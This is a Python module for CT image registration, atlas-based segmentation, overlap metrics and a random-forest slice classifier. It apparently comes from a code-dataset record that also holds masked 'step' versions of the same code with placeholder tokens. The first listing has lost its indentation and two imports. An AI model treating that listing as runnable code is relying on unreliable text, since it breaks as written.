from sklearn.ensemble import RandomForestClassifier
# # Estimation function # #
# --------------------------- #
# Linear registration function
# --------------------------- #
# --- Input --- #
# im_ref : The common (fixed) image [sitk-image]
# im_mov : The group (moving) image [sitk-image]
# mov_mask : Mask of the moving image, default is None [sitk-image]
# show_parameters : Set to True to print the parameters, False by default [boolean]
# --- Output --- #
# lin_xfm : Configured registration method [itk.simple.ImageRegistrationMethod]
def est_lin_transf(im_ref, im_mov, mov_mask=None, show_parameters=False):
initial_transform = sitk.CenteredTransformInitializer(im_ref, im_mov, sitk.ScaleSkewVersor3DTransform(),
sitk.CenteredTransformInitializerFilter.MOMENTS)
# Initialize registration
lin_transformation = sitk.ImageRegistrationMethod()
# Set metrics
lin_transformation.SetMetricAsMeanSquares()
lin_transformation.SetMetricSamplingStrategy(lin_transformation.RANDOM)
lin_transformation.SetMetricSamplingPercentage(0.01)
# Set mask
if mov_mask:
lin_transformation.SetMetricMovingMask(mov_mask)
# Gradient Descent optimizer
lin_transformation.SetOptimizerAsGradientDescent(learningRate=1, numberOfIterations=400,
convergenceMinimumValue=1e-6, convergenceWindowSize=10)
lin_transformation.SetOptimizerScalesFromPhysicalShift()
# Set the initial transformation
lin_transformation.SetInitialTransform(initial_transform)
# Switching to preferred variable
lin_xfm = lin_transformation
if show_parameters:
print(lin_xfm)
return lin_xfm
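# Hedged usage sketch (added for illustration, not from the original source):
# est_lin_transf only configures the registration; apply_transf further down
# executes it. The file names below are hypothetical placeholders.
"""
fixed = sitk.ReadImage("common_ct.nii.gz", sitk.sitkFloat32)
moving = sitk.ReadImage("group_ct.nii.gz", sitk.sitkFloat32)
reg = est_lin_transf(fixed, moving, show_parameters=True)
lin_transform = apply_transf(fixed, moving, reg)
"""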
# # Estimation function # #
# --------------------------- #
# Non-linear 'Demons' registration function
# --------------------------- #
# --- Input --- #
# im_ref : The common (fixed) image [sitk-image]
# fixed_mask : The mask of the common image, default is None [sitk-image]
# show_parameters : Set to True to print the parameters, False by default [boolean]
# --- Output --- #
# nl_xfm : Configured registration method [itk.simple.ImageRegistrationMethod]
def est_nl_transf(im_ref, fixed_mask=None, show_parameters=False):
# Initialize the registration
reg_method = sitk.ImageRegistrationMethod()
# Create initial identity transformation.
transform_to_displacement_field_filter = sitk.TransformToDisplacementFieldFilter()
transform_to_displacement_field_filter.SetReferenceImage(im_ref)
initial_transform = sitk.DisplacementFieldTransform(
transform_to_displacement_field_filter.Execute(sitk.Transform()))
# Regularization. The update field refers to fluid regularization; the total field to elastic regularization.
initial_transform.SetSmoothingGaussianOnUpdate(varianceForUpdateField=0, varianceForTotalField=1.5)
# Set the initial transformation
reg_method.SetInitialTransform(initial_transform)
# Set Demons registration
reg_method.SetMetricAsDemons(intensityDifferenceThreshold=0.001)
# Evaluate the metrics only in the mask
if fixed_mask is not None:
reg_method.SetMetricFixedMask(fixed_mask)
# Set a linear interpolator
reg_method.SetInterpolator(sitk.sitkLinear)
# Set a gradient descent optimizer
reg_method.SetOptimizerAsGradientDescent(learningRate=1.0, numberOfIterations=10, convergenceMinimumValue=1e-6,
convergenceWindowSize=10)
reg_method.SetOptimizerScalesFromPhysicalShift()
# Switching to the preferred variable
nl_xfm = reg_method
if show_parameters:
print(nl_xfm)
return nl_xfm
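# Hedged usage sketch (illustration only, reusing 'fixed' and 'moving' from
# the sketch above): the Demons registration is configured here and executed
# with apply_transf; the result is a displacement field transform.
"""
nl_reg = est_nl_transf(fixed)
displacement_field_transform = apply_transf(fixed, moving, nl_reg)
"""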
# # Application function # #
# --------------------------- #
# Executes either the linear or the non-linear function
# --------------------------- #
# --- Input --- #
# im_ref : The common (fixed) image [sitk-image]
# im_mov : The group (moving) image [sitk-image]
# trafo : The configured registration method [itk.simple.ImageRegistrationMethod]
# show_parameters : Set to True to print the parameters, False by default [boolean]
# --- Output --- #
# transf : The estimated transformation [itk.simple.Transform]
def apply_transf(im_ref, im_mov, trafo, show_parameters=False):
    # Run the configured registration method on the fixed and moving images
transf = trafo.Execute(sitk.Cast(im_ref, sitk.sitkFloat32), sitk.Cast(im_mov, sitk.sitkFloat32))
if show_parameters:
print(transf)
print("--------")
print("Optimizer stop condition: {0}".format(trafo.GetOptimizerStopConditionDescription()))
print("Number of iterations: {0}".format(trafo.GetOptimizerIteration()))
print("--------")
return transf
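# Hedged usage sketch (illustration only): the transform returned by
# apply_transf can be used to resample the moving image onto the reference
# grid, mirroring what seg_atlas below does for the masks.
"""
resampled = sitk.Resample(moving, fixed, lin_transform, sitk.sitkLinear,
                          0.0, moving.GetPixelID())
"""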
# # Atlas segmentation function # #
# --------------------------- #
# Atlas-based segmentation using the CT images in 'ct_list'
# and corresponding segmentation masks from 'seg_list'.
# After that, majority voting to return a segmentation mask.
# --------------------------- #
# --- Input --- #
# common_img : The chosen COMMON image [sitk-image]
# ct_list : List of GROUP images [list]
# seg_list : List of GROUP masks [list]
# --- Output --- #
# segmented_array : The segmentation as an array [numpy.ndarray]
def seg_atlas(common_img, ct_list, seg_list):
# Creating the necessary lists
seg = []
image_list = []
# # REGISTRATION # #
for i in range(len(ct_list)):
# Adjusting the settings and applying
trafo_settings = est_lin_transf(common_img, ct_list[i], mov_mask=seg_list[i], show_parameters=False)
final_trafo = apply_transf(common_img, ct_list[i], trafo_settings)
# Perform registration on mask image
resampler = sitk.ResampleImageFilter()
resampler.SetReferenceImage(common_img)
resampler.SetInterpolator(sitk.sitkLinear)
resampler.SetTransform(final_trafo)
resampled_mask = resampler.Execute(seg_list[i])
resampled_mask_data = sitk.GetArrayFromImage(resampled_mask)
seg.append(resampled_mask_data)
# # MAJORITY VOTING # #
for i in range(len(seg)):
for j in range(i + 1, len(seg)):
arr1 = np.transpose(np.nonzero(seg[i]))
arr2 = np.transpose(np.nonzero(seg[j]))
# Filling two lists
arr1list = [tuple(e) for e in arr1.tolist()]
arr2list = [tuple(e) for e in arr2.tolist()]
# Sorting both lists
arr1list.sort()
arr2list.sort()
# Creating necessary list & sorting
intersections = list(set(arr1list).intersection(arr2list))
intersections.sort()
image_list.append(intersections)
    # Union of the pairwise intersections: keeps voxels labeled by at least
    # two of the three atlases (the code assumes exactly 3 registered masks)
intersection_list = list(set(image_list[0]) | set(image_list[1]) | set(image_list[2]))
# Sorting the list
intersection_list.sort()
# Fetches array from image
image_array = sitk.GetArrayFromImage(common_img)
# Creates an array for the points and fills it using indexes
segmented_array = np.zeros(shape=image_array.shape, dtype=np.uint8)
for x, y, z in intersection_list:
segmented_array[x, y, z] = 1
return segmented_array
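# Hedged usage sketch (illustration only): three atlas CTs and masks are
# assumed, matching the hard-coded 3-way vote above. The returned array can
# be turned back into an image aligned with the common image.
"""
seg_array = seg_atlas(common_img, [ct1, ct2, ct3], [mask1, mask2, mask3])
seg_img = sitk.GetImageFromArray(seg_array)
seg_img.CopyInformation(common_img)
"""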
# # Similarity function # #
# --------------------------- #
# Calculates the following distances between images:
# 1. Jaccard coef.
# 2. Dice coef.
# 3. Hausdorff distance
# --------------------------- #
# --- Input --- #
# mask_img : The mask image [sitk-image]
# seg_img : The segmented image [sitk-image]
# --- Output --- #
# None
def distances(mask_img, seg_img):
# Creating the necessary filters
hausdorff = sitk.HausdorffDistanceImageFilter()
overlap = sitk.LabelOverlapMeasuresImageFilter()
# Execute filters
hausdorff.Execute(mask_img, seg_img)
overlap.Execute(mask_img, seg_img)
# Fetching the distances and appending to distance list
# Jaccard coef.
jaccard = overlap.GetJaccardCoefficient()
# Dice coef.
dice = overlap.GetDiceCoefficient()
# Hausdorff distance
hausdorff_distance = hausdorff.GetHausdorffDistance()
# Printing out the distances for user
print('The Hausdorff distance: {}'.format(
hausdorff_distance))
print('The Dice coefficient: {}'.format(dice))
print('The Jaccard coefficient: {}'.format(jaccard))
return None
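# Hedged usage sketch (illustration only): both inputs must be binary label
# images of identical size; casting to an integer pixel type is assumed here.
"""
distances(sitk.Cast(mask_img, sitk.sitkUInt8),
          sitk.Cast(seg_img, sitk.sitkUInt8))
"""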
# # Classifier Function # #
# --------------------------- #
# Trains a random forest classifier on 2D axial slices taken from CT volumes,
# using label vectors that mark whether each slice contains
# the pubic symphysis. The labels are binary.
# --------------------------- #
# --- Input --- #
# slice_list : List of 3D CT images to be split into 2D axial slices [list]
# vector_list : List of vectors with binary labels [list]
# --- Output --- #
# trained_forest : Trained random forest classifier [sklearn.ensemble.forest.RandomForestClassifier]
def train_classifier(slice_list, vector_list):
# Creating necessary list
x_train_list = []
# Reading in input data
for image in slice_list:
# Fetching arrays
image_array = sitk.GetArrayFromImage(image)
# Resizing
image_array.resize((512, 512, 512))
for z in range(image_array.shape[2]):
x_train_list.append(image_array[:, :, z].flatten())
x_train = np.asarray(x_train_list, dtype=np.uint8)
# Reading in training labels
y_train = None
for i in range(0, len(vector_list)):
if i == 0:
y_train = vector_list[i]
else:
y_train = np.concatenate([y_train, vector_list[i]])
# Train classifier
trained_forest = RandomForestClassifier(n_estimators=150)
trained_forest.fit(x_train, y_train)
return trained_forest
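# Hedged usage sketch (illustration only): each label vector is assumed to be
# a 1D numpy array with one binary entry per axial slice (512 after resizing).
"""
image_a = sitk.ReadImage("train_ct_a.nii.gz")  # hypothetical training volume
labels_a = np.zeros(512, dtype=np.uint8)
labels_a[200:230] = 1  # slices assumed to contain the pubic symphysis
forest = train_classifier([image_a], [labels_a])
"""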
# # Classifier Function # #
# --------------------------- #
# Applies a trained random forest classifier to a CT image and prints
# which slice has the highest probability of containing the pubic symphysis.
# --------------------------- #
# --- Input --- #
# ct_image : The CT image whose axial slices are classified [sitk-image]
# classifier : Trained random forest classifier [sklearn.ensemble.forest.RandomForestClassifier]
# --- Output --- #
# None
def slice_probability(ct_image, classifier):
# Creating necessary lists
test_list = []
max_list = []
# Convert image to numpy array & resize
im_array = sitk.GetArrayFromImage(ct_image)
im_array.resize((512, 512, 512))
for z in range(im_array.shape[2]):
test_list.append(im_array[:, :, z].flatten())
test_array = np.asarray(test_list, dtype=np.uint8)
# Predict probabilities for each slice
probabilities = classifier.predict_proba(test_array)
    # Highest predicted probability of the positive class across all slices
max = np.amax(probabilities, axis=0)[1]
for i, prob in enumerate(probabilities):
if prob[1] == max:
max_list.append(i)
# Print result to user
if len(max_list) == 1:
print("Slice {} has highest probability which is: {}".format(max_list[0], max))
else:
print("Slices {} have the highest probability which is: {}".format(max_list, max))
return None
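# Hedged usage sketch (illustration only): applies the 'forest' classifier
# from the sketch above to a hypothetical unseen CT volume.
"""
test_img = sitk.ReadImage("test_ct.nii.gz")
slice_probability(test_img, forest)
"""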
|
flexible
|
{
"blob_id": "2b7d9ded82fa980eeae06beb2d84d89612d53df1",
"index": 821,
"step-1": "<mask token>\n\n\ndef est_lin_transf(im_ref, im_mov, mov_mask=None, show_parameters=False):\n initial_transform = sitk.CenteredTransformInitializer(im_ref, im_mov,\n sitk.ScaleSkewVersor3DTransform(), sitk.\n CenteredTransformInitializerFilter.MOMENTS)\n lin_transformation = sitk.ImageRegistrationMethod()\n lin_transformation.SetMetricAsMeanSquares()\n lin_transformation.SetMetricSamplingStrategy(lin_transformation.RANDOM)\n lin_transformation.SetMetricSamplingPercentage(0.01)\n if mov_mask:\n lin_transformation.SetMetricMovingMask(mov_mask)\n lin_transformation.SetOptimizerAsGradientDescent(learningRate=1,\n numberOfIterations=400, convergenceMinimumValue=1e-06,\n convergenceWindowSize=10)\n lin_transformation.SetOptimizerScalesFromPhysicalShift()\n lin_transformation.SetInitialTransform(initial_transform)\n lin_xfm = lin_transformation\n if show_parameters:\n print(lin_xfm)\n return lin_xfm\n\n\ndef est_nl_transf(im_ref, fixed_mask=None, show_parameters=False):\n reg_method = sitk.ImageRegistrationMethod()\n transform_to_displacement_field_filter = (sitk.\n TransformToDisplacementFieldFilter())\n transform_to_displacement_field_filter.SetReferenceImage(im_ref)\n initial_transform = sitk.DisplacementFieldTransform(\n transform_to_displacement_field_filter.Execute(sitk.Transform()))\n initial_transform.SetSmoothingGaussianOnUpdate(varianceForUpdateField=0,\n varianceForTotalField=1.5)\n reg_method.SetInitialTransform(initial_transform)\n reg_method.SetMetricAsDemons(intensityDifferenceThreshold=0.001)\n if fixed_mask is not None:\n reg_method.SetMetricFixedMask(fixed_mask)\n reg_method.SetInterpolator(sitk.sitkLinear)\n reg_method.SetOptimizerAsGradientDescent(learningRate=1.0,\n numberOfIterations=10, convergenceMinimumValue=1e-06,\n convergenceWindowSize=10)\n reg_method.SetOptimizerScalesFromPhysicalShift()\n nl_xfm = reg_method\n if show_parameters:\n print(nl_xfm)\n return nl_xfm\n\n\ndef apply_transf(im_ref, im_mov, trafo, show_parameters=False):\n transf = trafo.Execute(sitk.Cast(im_ref, sitk.sitkFloat32), sitk.Cast(\n im_mov, sitk.sitkFloat32))\n if show_parameters:\n print(transf)\n print('--------')\n print('Optimizer stop condition: {0}'.format(trafo.\n GetOptimizerStopConditionDescription()))\n print('Number of iterations: {0}'.format(trafo.GetOptimizerIteration())\n )\n print('--------')\n return transf\n\n\n<mask token>\n\n\ndef distances(mask_img, seg_img):\n hausdorff = sitk.HausdorffDistanceImageFilter()\n overlap = sitk.LabelOverlapMeasuresImageFilter()\n hausdorff.Execute(mask_img, seg_img)\n overlap.Execute(mask_img, seg_img)\n jaccard = overlap.GetJaccardCoefficient()\n dice = overlap.GetDiceCoefficient()\n hausdorff_distance = hausdorff.GetHausdorffDistance()\n print('The Hausdorff distance: {}'.format(hausdorff_distance))\n print('The Dice coefficient: {}'.format(dice))\n print('The Jaccard coefficient: {}'.format(jaccard))\n return None\n\n\ndef train_classifier(slice_list, vector_list):\n x_train_list = []\n for image in slice_list:\n image_array = sitk.GetArrayFromImage(image)\n image_array.resize((512, 512, 512))\n for z in range(image_array.shape[2]):\n x_train_list.append(image_array[:, :, z].flatten())\n x_train = np.asarray(x_train_list, dtype=np.uint8)\n y_train = None\n for i in range(0, len(vector_list)):\n if i == 0:\n y_train = vector_list[i]\n else:\n y_train = np.concatenate([y_train, vector_list[i]])\n trained_forest = RandomForestClassifier(n_estimators=150)\n trained_forest.fit(x_train, y_train)\n return trained_forest\n\n\n<mask 
token>\n",
"step-2": "<mask token>\n\n\ndef est_lin_transf(im_ref, im_mov, mov_mask=None, show_parameters=False):\n initial_transform = sitk.CenteredTransformInitializer(im_ref, im_mov,\n sitk.ScaleSkewVersor3DTransform(), sitk.\n CenteredTransformInitializerFilter.MOMENTS)\n lin_transformation = sitk.ImageRegistrationMethod()\n lin_transformation.SetMetricAsMeanSquares()\n lin_transformation.SetMetricSamplingStrategy(lin_transformation.RANDOM)\n lin_transformation.SetMetricSamplingPercentage(0.01)\n if mov_mask:\n lin_transformation.SetMetricMovingMask(mov_mask)\n lin_transformation.SetOptimizerAsGradientDescent(learningRate=1,\n numberOfIterations=400, convergenceMinimumValue=1e-06,\n convergenceWindowSize=10)\n lin_transformation.SetOptimizerScalesFromPhysicalShift()\n lin_transformation.SetInitialTransform(initial_transform)\n lin_xfm = lin_transformation\n if show_parameters:\n print(lin_xfm)\n return lin_xfm\n\n\ndef est_nl_transf(im_ref, fixed_mask=None, show_parameters=False):\n reg_method = sitk.ImageRegistrationMethod()\n transform_to_displacement_field_filter = (sitk.\n TransformToDisplacementFieldFilter())\n transform_to_displacement_field_filter.SetReferenceImage(im_ref)\n initial_transform = sitk.DisplacementFieldTransform(\n transform_to_displacement_field_filter.Execute(sitk.Transform()))\n initial_transform.SetSmoothingGaussianOnUpdate(varianceForUpdateField=0,\n varianceForTotalField=1.5)\n reg_method.SetInitialTransform(initial_transform)\n reg_method.SetMetricAsDemons(intensityDifferenceThreshold=0.001)\n if fixed_mask is not None:\n reg_method.SetMetricFixedMask(fixed_mask)\n reg_method.SetInterpolator(sitk.sitkLinear)\n reg_method.SetOptimizerAsGradientDescent(learningRate=1.0,\n numberOfIterations=10, convergenceMinimumValue=1e-06,\n convergenceWindowSize=10)\n reg_method.SetOptimizerScalesFromPhysicalShift()\n nl_xfm = reg_method\n if show_parameters:\n print(nl_xfm)\n return nl_xfm\n\n\ndef apply_transf(im_ref, im_mov, trafo, show_parameters=False):\n transf = trafo.Execute(sitk.Cast(im_ref, sitk.sitkFloat32), sitk.Cast(\n im_mov, sitk.sitkFloat32))\n if show_parameters:\n print(transf)\n print('--------')\n print('Optimizer stop condition: {0}'.format(trafo.\n GetOptimizerStopConditionDescription()))\n print('Number of iterations: {0}'.format(trafo.GetOptimizerIteration())\n )\n print('--------')\n return transf\n\n\ndef seg_atlas(common_img, ct_list, seg_list):\n seg = []\n image_list = []\n for i in range(len(ct_list)):\n trafo_settings = est_lin_transf(common_img, ct_list[i], mov_mask=\n seg_list[i], show_parameters=False)\n final_trafo = apply_transf(common_img, ct_list[i], trafo_settings)\n resampler = sitk.ResampleImageFilter()\n resampler.SetReferenceImage(common_img)\n resampler.SetInterpolator(sitk.sitkLinear)\n resampler.SetTransform(final_trafo)\n resampled_mask = resampler.Execute(seg_list[i])\n resampled_mask_data = sitk.GetArrayFromImage(resampled_mask)\n seg.append(resampled_mask_data)\n for i in range(len(seg)):\n for j in range(i + 1, len(seg)):\n arr1 = np.transpose(np.nonzero(seg[i]))\n arr2 = np.transpose(np.nonzero(seg[j]))\n arr1list = [tuple(e) for e in arr1.tolist()]\n arr2list = [tuple(e) for e in arr2.tolist()]\n arr1list.sort()\n arr2list.sort()\n intersections = list(set(arr1list).intersection(arr2list))\n intersections.sort()\n image_list.append(intersections)\n intersection_list = list(set(image_list[0]) | set(image_list[1]) | set(\n image_list[2]))\n intersection_list.sort()\n image_array = sitk.GetArrayFromImage(common_img)\n segmented_array = 
np.zeros(shape=image_array.shape, dtype=np.uint8)\n for x, y, z in intersection_list:\n segmented_array[x, y, z] = 1\n return segmented_array\n\n\ndef distances(mask_img, seg_img):\n hausdorff = sitk.HausdorffDistanceImageFilter()\n overlap = sitk.LabelOverlapMeasuresImageFilter()\n hausdorff.Execute(mask_img, seg_img)\n overlap.Execute(mask_img, seg_img)\n jaccard = overlap.GetJaccardCoefficient()\n dice = overlap.GetDiceCoefficient()\n hausdorff_distance = hausdorff.GetHausdorffDistance()\n print('The Hausdorff distance: {}'.format(hausdorff_distance))\n print('The Dice coefficient: {}'.format(dice))\n print('The Jaccard coefficient: {}'.format(jaccard))\n return None\n\n\ndef train_classifier(slice_list, vector_list):\n x_train_list = []\n for image in slice_list:\n image_array = sitk.GetArrayFromImage(image)\n image_array.resize((512, 512, 512))\n for z in range(image_array.shape[2]):\n x_train_list.append(image_array[:, :, z].flatten())\n x_train = np.asarray(x_train_list, dtype=np.uint8)\n y_train = None\n for i in range(0, len(vector_list)):\n if i == 0:\n y_train = vector_list[i]\n else:\n y_train = np.concatenate([y_train, vector_list[i]])\n trained_forest = RandomForestClassifier(n_estimators=150)\n trained_forest.fit(x_train, y_train)\n return trained_forest\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef est_lin_transf(im_ref, im_mov, mov_mask=None, show_parameters=False):\n initial_transform = sitk.CenteredTransformInitializer(im_ref, im_mov,\n sitk.ScaleSkewVersor3DTransform(), sitk.\n CenteredTransformInitializerFilter.MOMENTS)\n lin_transformation = sitk.ImageRegistrationMethod()\n lin_transformation.SetMetricAsMeanSquares()\n lin_transformation.SetMetricSamplingStrategy(lin_transformation.RANDOM)\n lin_transformation.SetMetricSamplingPercentage(0.01)\n if mov_mask:\n lin_transformation.SetMetricMovingMask(mov_mask)\n lin_transformation.SetOptimizerAsGradientDescent(learningRate=1,\n numberOfIterations=400, convergenceMinimumValue=1e-06,\n convergenceWindowSize=10)\n lin_transformation.SetOptimizerScalesFromPhysicalShift()\n lin_transformation.SetInitialTransform(initial_transform)\n lin_xfm = lin_transformation\n if show_parameters:\n print(lin_xfm)\n return lin_xfm\n\n\ndef est_nl_transf(im_ref, fixed_mask=None, show_parameters=False):\n reg_method = sitk.ImageRegistrationMethod()\n transform_to_displacement_field_filter = (sitk.\n TransformToDisplacementFieldFilter())\n transform_to_displacement_field_filter.SetReferenceImage(im_ref)\n initial_transform = sitk.DisplacementFieldTransform(\n transform_to_displacement_field_filter.Execute(sitk.Transform()))\n initial_transform.SetSmoothingGaussianOnUpdate(varianceForUpdateField=0,\n varianceForTotalField=1.5)\n reg_method.SetInitialTransform(initial_transform)\n reg_method.SetMetricAsDemons(intensityDifferenceThreshold=0.001)\n if fixed_mask is not None:\n reg_method.SetMetricFixedMask(fixed_mask)\n reg_method.SetInterpolator(sitk.sitkLinear)\n reg_method.SetOptimizerAsGradientDescent(learningRate=1.0,\n numberOfIterations=10, convergenceMinimumValue=1e-06,\n convergenceWindowSize=10)\n reg_method.SetOptimizerScalesFromPhysicalShift()\n nl_xfm = reg_method\n if show_parameters:\n print(nl_xfm)\n return nl_xfm\n\n\ndef apply_transf(im_ref, im_mov, trafo, show_parameters=False):\n transf = trafo.Execute(sitk.Cast(im_ref, sitk.sitkFloat32), sitk.Cast(\n im_mov, sitk.sitkFloat32))\n if show_parameters:\n print(transf)\n print('--------')\n print('Optimizer stop condition: {0}'.format(trafo.\n GetOptimizerStopConditionDescription()))\n print('Number of iterations: {0}'.format(trafo.GetOptimizerIteration())\n )\n print('--------')\n return transf\n\n\ndef seg_atlas(common_img, ct_list, seg_list):\n seg = []\n image_list = []\n for i in range(len(ct_list)):\n trafo_settings = est_lin_transf(common_img, ct_list[i], mov_mask=\n seg_list[i], show_parameters=False)\n final_trafo = apply_transf(common_img, ct_list[i], trafo_settings)\n resampler = sitk.ResampleImageFilter()\n resampler.SetReferenceImage(common_img)\n resampler.SetInterpolator(sitk.sitkLinear)\n resampler.SetTransform(final_trafo)\n resampled_mask = resampler.Execute(seg_list[i])\n resampled_mask_data = sitk.GetArrayFromImage(resampled_mask)\n seg.append(resampled_mask_data)\n for i in range(len(seg)):\n for j in range(i + 1, len(seg)):\n arr1 = np.transpose(np.nonzero(seg[i]))\n arr2 = np.transpose(np.nonzero(seg[j]))\n arr1list = [tuple(e) for e in arr1.tolist()]\n arr2list = [tuple(e) for e in arr2.tolist()]\n arr1list.sort()\n arr2list.sort()\n intersections = list(set(arr1list).intersection(arr2list))\n intersections.sort()\n image_list.append(intersections)\n intersection_list = list(set(image_list[0]) | set(image_list[1]) | set(\n image_list[2]))\n intersection_list.sort()\n image_array = sitk.GetArrayFromImage(common_img)\n segmented_array = 
np.zeros(shape=image_array.shape, dtype=np.uint8)\n for x, y, z in intersection_list:\n segmented_array[x, y, z] = 1\n return segmented_array\n\n\ndef distances(mask_img, seg_img):\n hausdorff = sitk.HausdorffDistanceImageFilter()\n overlap = sitk.LabelOverlapMeasuresImageFilter()\n hausdorff.Execute(mask_img, seg_img)\n overlap.Execute(mask_img, seg_img)\n jaccard = overlap.GetJaccardCoefficient()\n dice = overlap.GetDiceCoefficient()\n hausdorff_distance = hausdorff.GetHausdorffDistance()\n print('The Hausdorff distance: {}'.format(hausdorff_distance))\n print('The Dice coefficient: {}'.format(dice))\n print('The Jaccard coefficient: {}'.format(jaccard))\n return None\n\n\ndef train_classifier(slice_list, vector_list):\n x_train_list = []\n for image in slice_list:\n image_array = sitk.GetArrayFromImage(image)\n image_array.resize((512, 512, 512))\n for z in range(image_array.shape[2]):\n x_train_list.append(image_array[:, :, z].flatten())\n x_train = np.asarray(x_train_list, dtype=np.uint8)\n y_train = None\n for i in range(0, len(vector_list)):\n if i == 0:\n y_train = vector_list[i]\n else:\n y_train = np.concatenate([y_train, vector_list[i]])\n trained_forest = RandomForestClassifier(n_estimators=150)\n trained_forest.fit(x_train, y_train)\n return trained_forest\n\n\ndef slice_probability(ct_image, classifier):\n test_list = []\n max_list = []\n im_array = sitk.GetArrayFromImage(ct_image)\n im_array.resize((512, 512, 512))\n for z in range(im_array.shape[2]):\n test_list.append(im_array[:, :, z].flatten())\n test_array = np.asarray(test_list, dtype=np.uint8)\n probabilities = classifier.predict_proba(test_array)\n max = np.amax(probabilities, axis=0)[1]\n for i, prob in enumerate(probabilities):\n if prob[1] == max:\n max_list.append(i)\n if len(max_list) == 1:\n print('Slice {} has highest probability which is: {}'.format(\n max_list[0], max))\n else:\n print('Slices {} have the highest probability which is: {}'.format(\n max_list, max))\n return None\n",
"step-4": "import SimpleITK as sitk\nimport numpy as np\nfrom sklearn.ensemble import RandomForestClassifier\n\n\ndef est_lin_transf(im_ref, im_mov, mov_mask=None, show_parameters=False):\n initial_transform = sitk.CenteredTransformInitializer(im_ref, im_mov,\n sitk.ScaleSkewVersor3DTransform(), sitk.\n CenteredTransformInitializerFilter.MOMENTS)\n lin_transformation = sitk.ImageRegistrationMethod()\n lin_transformation.SetMetricAsMeanSquares()\n lin_transformation.SetMetricSamplingStrategy(lin_transformation.RANDOM)\n lin_transformation.SetMetricSamplingPercentage(0.01)\n if mov_mask:\n lin_transformation.SetMetricMovingMask(mov_mask)\n lin_transformation.SetOptimizerAsGradientDescent(learningRate=1,\n numberOfIterations=400, convergenceMinimumValue=1e-06,\n convergenceWindowSize=10)\n lin_transformation.SetOptimizerScalesFromPhysicalShift()\n lin_transformation.SetInitialTransform(initial_transform)\n lin_xfm = lin_transformation\n if show_parameters:\n print(lin_xfm)\n return lin_xfm\n\n\ndef est_nl_transf(im_ref, fixed_mask=None, show_parameters=False):\n reg_method = sitk.ImageRegistrationMethod()\n transform_to_displacement_field_filter = (sitk.\n TransformToDisplacementFieldFilter())\n transform_to_displacement_field_filter.SetReferenceImage(im_ref)\n initial_transform = sitk.DisplacementFieldTransform(\n transform_to_displacement_field_filter.Execute(sitk.Transform()))\n initial_transform.SetSmoothingGaussianOnUpdate(varianceForUpdateField=0,\n varianceForTotalField=1.5)\n reg_method.SetInitialTransform(initial_transform)\n reg_method.SetMetricAsDemons(intensityDifferenceThreshold=0.001)\n if fixed_mask is not None:\n reg_method.SetMetricFixedMask(fixed_mask)\n reg_method.SetInterpolator(sitk.sitkLinear)\n reg_method.SetOptimizerAsGradientDescent(learningRate=1.0,\n numberOfIterations=10, convergenceMinimumValue=1e-06,\n convergenceWindowSize=10)\n reg_method.SetOptimizerScalesFromPhysicalShift()\n nl_xfm = reg_method\n if show_parameters:\n print(nl_xfm)\n return nl_xfm\n\n\ndef apply_transf(im_ref, im_mov, trafo, show_parameters=False):\n transf = trafo.Execute(sitk.Cast(im_ref, sitk.sitkFloat32), sitk.Cast(\n im_mov, sitk.sitkFloat32))\n if show_parameters:\n print(transf)\n print('--------')\n print('Optimizer stop condition: {0}'.format(trafo.\n GetOptimizerStopConditionDescription()))\n print('Number of iterations: {0}'.format(trafo.GetOptimizerIteration())\n )\n print('--------')\n return transf\n\n\ndef seg_atlas(common_img, ct_list, seg_list):\n seg = []\n image_list = []\n for i in range(len(ct_list)):\n trafo_settings = est_lin_transf(common_img, ct_list[i], mov_mask=\n seg_list[i], show_parameters=False)\n final_trafo = apply_transf(common_img, ct_list[i], trafo_settings)\n resampler = sitk.ResampleImageFilter()\n resampler.SetReferenceImage(common_img)\n resampler.SetInterpolator(sitk.sitkLinear)\n resampler.SetTransform(final_trafo)\n resampled_mask = resampler.Execute(seg_list[i])\n resampled_mask_data = sitk.GetArrayFromImage(resampled_mask)\n seg.append(resampled_mask_data)\n for i in range(len(seg)):\n for j in range(i + 1, len(seg)):\n arr1 = np.transpose(np.nonzero(seg[i]))\n arr2 = np.transpose(np.nonzero(seg[j]))\n arr1list = [tuple(e) for e in arr1.tolist()]\n arr2list = [tuple(e) for e in arr2.tolist()]\n arr1list.sort()\n arr2list.sort()\n intersections = list(set(arr1list).intersection(arr2list))\n intersections.sort()\n image_list.append(intersections)\n intersection_list = list(set(image_list[0]) | set(image_list[1]) | set(\n image_list[2]))\n 
intersection_list.sort()\n image_array = sitk.GetArrayFromImage(common_img)\n segmented_array = np.zeros(shape=image_array.shape, dtype=np.uint8)\n for x, y, z in intersection_list:\n segmented_array[x, y, z] = 1\n return segmented_array\n\n\ndef distances(mask_img, seg_img):\n hausdorff = sitk.HausdorffDistanceImageFilter()\n overlap = sitk.LabelOverlapMeasuresImageFilter()\n hausdorff.Execute(mask_img, seg_img)\n overlap.Execute(mask_img, seg_img)\n jaccard = overlap.GetJaccardCoefficient()\n dice = overlap.GetDiceCoefficient()\n hausdorff_distance = hausdorff.GetHausdorffDistance()\n print('The Hausdorff distance: {}'.format(hausdorff_distance))\n print('The Dice coefficient: {}'.format(dice))\n print('The Jaccard coefficient: {}'.format(jaccard))\n return None\n\n\ndef train_classifier(slice_list, vector_list):\n x_train_list = []\n for image in slice_list:\n image_array = sitk.GetArrayFromImage(image)\n image_array.resize((512, 512, 512))\n for z in range(image_array.shape[2]):\n x_train_list.append(image_array[:, :, z].flatten())\n x_train = np.asarray(x_train_list, dtype=np.uint8)\n y_train = None\n for i in range(0, len(vector_list)):\n if i == 0:\n y_train = vector_list[i]\n else:\n y_train = np.concatenate([y_train, vector_list[i]])\n trained_forest = RandomForestClassifier(n_estimators=150)\n trained_forest.fit(x_train, y_train)\n return trained_forest\n\n\ndef slice_probability(ct_image, classifier):\n test_list = []\n max_list = []\n im_array = sitk.GetArrayFromImage(ct_image)\n im_array.resize((512, 512, 512))\n for z in range(im_array.shape[2]):\n test_list.append(im_array[:, :, z].flatten())\n test_array = np.asarray(test_list, dtype=np.uint8)\n probabilities = classifier.predict_proba(test_array)\n max = np.amax(probabilities, axis=0)[1]\n for i, prob in enumerate(probabilities):\n if prob[1] == max:\n max_list.append(i)\n if len(max_list) == 1:\n print('Slice {} has highest probability which is: {}'.format(\n max_list[0], max))\n else:\n print('Slices {} have the highest probability which is: {}'.format(\n max_list, max))\n return None\n",
